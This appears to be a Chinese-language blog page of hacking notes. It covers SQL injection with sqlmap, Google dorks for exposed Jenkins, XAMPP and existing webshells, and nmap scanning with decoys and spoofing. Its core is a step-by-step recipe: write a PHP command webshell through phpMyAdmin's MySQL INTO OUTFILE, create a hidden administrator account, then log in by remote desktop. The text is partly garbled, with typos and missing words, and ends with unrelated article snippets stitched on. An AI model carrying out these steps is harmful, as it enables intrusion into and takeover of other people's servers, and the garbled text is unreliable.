第一步:啟用postgresql服務。service postgresql start
第二步:啟用metasploit服務。service matasploit start
第三步:啟動框架。msfconsole
1.**:asp?id+13,後面加',看看是什麼資料庫,然後輸入1=1,1=2,得到資料庫是microsoft acess
拆解表名
1.拆解乙個表的列名
2.得到感興趣的字段的值
找到登入按鈕
教訓:資料庫密碼一定要加密!
index.php?id=1,同上,得到資料庫為mysql
1.掃瞄資料庫
2.掃瞄某個資料庫的表
命令:sqlmap -u 目標**--dbms mysql
-d 資料庫名 --tables,引數可自行選擇
檢視表字段
同上將找到的路徑放進去檢視,乙個個試試,附加上檢視源**,找manage
提公升管理員許可權:
用fiddler看看頁面情況,檢視系統返回的**,編輯建立html檔案,執行,設定fiddler(auto),將返回結果儲存在本地。
返回頁面
1.尋找持續構建工具jenkins管理面板,有可能獲取某些專案的源**或者敏感資訊;
2.綜合利用各種資訊搞定xampp,乙個整合架構,包括比如phpmyadmin之類的東西
3.後門查詢
4.關於google hack database
google hack語法查詢:
1.inurl:8080 intitle:"dashboard [jenkins]" 造成源**洩露
尋找安裝xampp的主機:inurl:"xampp/index" intext:"xampp for windows"
1)尋找phpmyadmin不用驗證或者弱口令管理頁面,通過mysql的root許可權插入一句話木馬提取,獲取伺服器管理許可權
2>>連線**的mysql伺服器
use mysql
3>>建立表
4>>向表中插入資料,其實插入的是一段命令,呼叫cmd並且在系統環境下執行
命令:insert into aa (packet) values('
<? @sysytem($_get["cmd"]); ?>')
5>>select * into outfile ' / / / /aa.php ' from aa,這裡的路徑應該是可執行的。可以將路徑貼上下來,寫如phpinfo的路徑
6>>訪問這個**位址。........../aa.php
7>>好了,接下來我們前面插入的那句話就要起作用啦。試著訪問........../aa.php?cmd=dir,這裡可以寫好多命令哦
8>>接下來建立賬號cmd=net user 小明 123456 /add ,建立成功!
9>>將我們建立的賬戶新增到管理員使用者組cmd=net localgroup administrators 小明 /add
10>>啟動mstsc,遠端連線,使用者名稱和密碼就是我們剛剛建立的小明和123456
google搜尋目標:intitle:"=[1n73ct10n privat shell]="
intitle:"wso 2.4"[sec.info],[files],[console],[sql],[php],[safe mode],[string tools],[bruteforce],[network],[self remove]
進入kali,用命令setoolkit啟動,選1。攻擊方法:
主機掃瞄:
namp -sl 103.10.87.1-255 列表掃瞄
nmap -pe ip
nmap -pn ip(不適用ping掃瞄,更適用於internet)
nmap -sp ip(快速ping掃瞄),用來快速發現存活主機
-sn引數,只探測存活主機,不管埠啥的
嘗試多種掃瞄方式,來掃瞄主機
埠掃瞄:
nmap -ss ip
nmap -st ip ;tcp埠掃瞄
nmap -su ip; udp埠掃瞄
nmap -su -p 80,445 ip ;指定埠
nmap -st -v ip啟用細節模式
作業系統探測:
引數:-o(啟用作業系統檢測)
-osscan-limit(針對指定的目標進行作業系統檢測)
--osscan-guess;--fuzzy(推測os檢測結果,在nmap不能給出確定結果的情況下使用)
示例:nmap -st -o ip
nmap -st -p 3390 -o --osscan-limit ip (只有開啟3390埠,才進行作業系統版本探測)
namp -sa -o ip
服務程式探測:
nmap -sa -sv ip 掃瞄方式ack ;掃瞄某台主機的服務程式
nmap -sv -p 22,53,110 ;掃瞄某個服務的服務程式
nmap高階用法:
nmap --iflist(檢視本地路由與介面) 可以看到閘道器位址,網路介面啥的
nmap -e 08:00:27:47:63:e6 ip(指定mac和ip位址)(本地有多個網路介面時
nmap -t4 -f -n -pn -d192.168.1.100,192.168.1.101,192.168.1.102,me 192.168.1.103(位址誘騙)前面位址都是虛假的,後面的才是真的
nmap -sv --spoof -mac 08:00:27:47:63:e6 ip(虛假mac位址)
nmap -sv --source-port 900 ip --source-port(指定源埠)
nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(掃瞄思科路由器)
nmap -su -p69 -nvv 192.168.1.253(掃瞄路由器的tftp協議)
nmap -o -f -n 103.10.87.148(-f快速掃瞄) 掃瞄常見的埠
nmap --script=brute 103.10.87.148(暴力破解)
專注於網路埠的掃瞄
官方站點:
原始碼:預設情況使用syn掃瞄方式
滲透測試的福音 既好用成本又低的雲端模糊測試
6年前一篇研究文章中提出的微軟理念 雲端模糊測試 fuzzing 將徹底改變安全測試 以 project springfield 漏洞發現專案的登場亮相作為其實現形式。project springfield 是基於azure雲的服務,依靠自動向 提交不良輸入來發現軟體漏洞。微軟提出的 雲端模糊測試即...
滲透防護牆的滲透技術
說到通道技術,我想再提一下 埠復用 很多朋友以為通道技術就是埠復用技術。那麼,錯了,埠復用是指乙個埠上建立了多個連線,而不是在乙個端 口上面開放了多個服務而互不干擾。假如你想在已經開放了www服務的主機上,在80埠再新增一項服務,只有2種可能 1.新增服務失敗 2.www服務出錯。那麼什麼是通道呢?...
怎麼滲透驗證 mysql mysql 滲透測試
這裡以kali 中的mysql 做演示 mysql 的賬號密碼 放在mysql 庫中的 user 和 password 給root 增加密碼 update mysql.user set password password echod where user root 增添mysql 使用者 inser...